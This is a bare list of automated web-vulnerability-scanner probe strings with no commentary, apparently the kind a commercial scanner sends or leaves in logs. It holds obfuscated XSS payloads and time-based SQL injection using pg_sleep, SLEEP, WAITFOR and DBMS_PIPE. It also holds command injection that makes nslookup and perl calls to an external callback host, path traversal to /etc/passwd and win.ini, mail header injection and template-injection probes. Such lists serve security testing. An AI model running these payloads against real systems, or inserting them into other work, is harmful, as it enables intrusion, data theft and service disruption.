http://attacker-9164/log.php?
}body{acu:Expre/**/SSion(a9uE(9355))}
\u003CScRiPt\a9uE(9273)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%61%39%75%45%289937%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9107/log.php?
}body{acu:Expre/**/SSion(2M8u(9786))}
\u003CScRiPt\2M8u(9986)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%32%4D%38%75%289405%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
http://attacker-9078/log.php?
}body{acu:Expre/**/SSion(KtB5(9625))}
\u003CScRiPt\KtB5(9380)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%4B%74%42%35%289883%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
acu10788<s1﹥s2ʺs3ʹuca10788
http://attacker-9146/log.php?
}body{acu:Expre/**/SSion(hucn(9097))}
http://attacker-9658/log.php?
\u003CScRiPt\hucn(9958)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%68%75%63%6E%289852%29%3C%2F%73%43%72%69%70%54%3E
}body{acu:Expre/**/SSion(8LXp(9244))}
\u003CScRiPt\8LXp(9207)\u003C/sCripT\u003E
%0A%3C%53%63%52%69%50%74%20%3E%38%4C%58%70%289883%29%3C%2F%73%43%72%69%70%54%3E
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
acx__${98991*97996}__::.x
''||(select 1 from (select pg_sleep(15))x)||''
'||(select 1 from (select pg_sleep(15))x)||'
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
3dirlSQV')) OR 956=(SELECT 956 FROM PG_SLEEP(15))--
0tc7xOWK') OR 801=(SELECT 801 FROM PG_SLEEP(15))--
Q9Wd0Zoz' OR 94=(SELECT 94 FROM PG_SLEEP(15))--
-1)) OR 122=(SELECT 122 FROM PG_SLEEP(15))--
-5) OR 222=(SELECT 222 FROM PG_SLEEP(15))--
-5 OR 187=(SELECT 187 FROM PG_SLEEP(15))--
1 waitfor delay '0:0:15' --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(sele...
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
if(now()=sysdate(),sleep(15),0)
-1 OR 3+826-826-1=0+0+0+1
-1 OR 2+826-826-1=0+0+0+1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
'+'A'.concat(70-3).concat(22*4).concat(112).concat(81).concat(105).concat(75)+(require'socket'
So...
"+"A".concat(70-3).concat(22*4).concat(114).concat(74).concat(118).concat(74)+(require"socket"
So...
HttP://bxss.me/t/xss.html?%00
http://bxss.me/t/fit.txt?.jpg
1some_inexistent_file_with_long_name
ctime
sleep
p0
(I30
tp1
Rp2
.
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
`(nslookup hitbhjemabobk37eed.bxss.me||perl -e "gethostbyname('hitbhjemabobk37eed.bxss.me')")`
|(nslookup hitnkhdgxsvtkb71b4.bxss.me||perl -e "gethostbyname('hitnkhdgxsvtkb71b4.bxss.me')")
".gethostbyname(lc("hitzp"."eabtplby5ba2a.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(80)...
&(nslookup hitadeejrfxmn77296.bxss.me||perl -e "gethostbyname('hitadeejrfxmn77296.bxss.me')")&'\"...
'.gethostbyname(lc('hitof'.'ykhjctab4fa34.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(84)...
$(nslookup hitsjdxxakish12d4c.bxss.me||perl -e "gethostbyname('hitsjdxxakish12d4c.bxss.me')")
(nslookup hithulshwzdzgb2c59.bxss.me||perl -e "gethostbyname('hithulshwzdzgb2c59.bxss.me')")
|echo zppaef$()\ umkahq\nz^xyu||a #' |echo zppaef$()\ umkahq\nz^xyu||a #|" |echo zppaef$()\ umkah...
&echo dlxdei$()\ debejx\nz^xyu||a #' &echo dlxdei$()\ debejx\nz^xyu||a #|" &echo dlxdei$()\ debej...
echo uozyrg$()\ eciyae\nz^xyu||a #' &echo uozyrg$()\ eciyae\nz^xyu||a #|" &echo uozyrg$()\ eciyae...
../../../../../../../../../../../../../../windows/win.ini
../../../../../../../../../../../../../../etc/passwd
to@example.com>
bcc:074625.19373-151586.19373.4a6a4.19130.2@bxss.me
bcc:074625.19373-151585.19373.4a6a4.19130.2@bxss.me
"+response.write(9814634*9118702)+"
'+response.write(9814634*9118702)+'
response.write(9814634*9118702)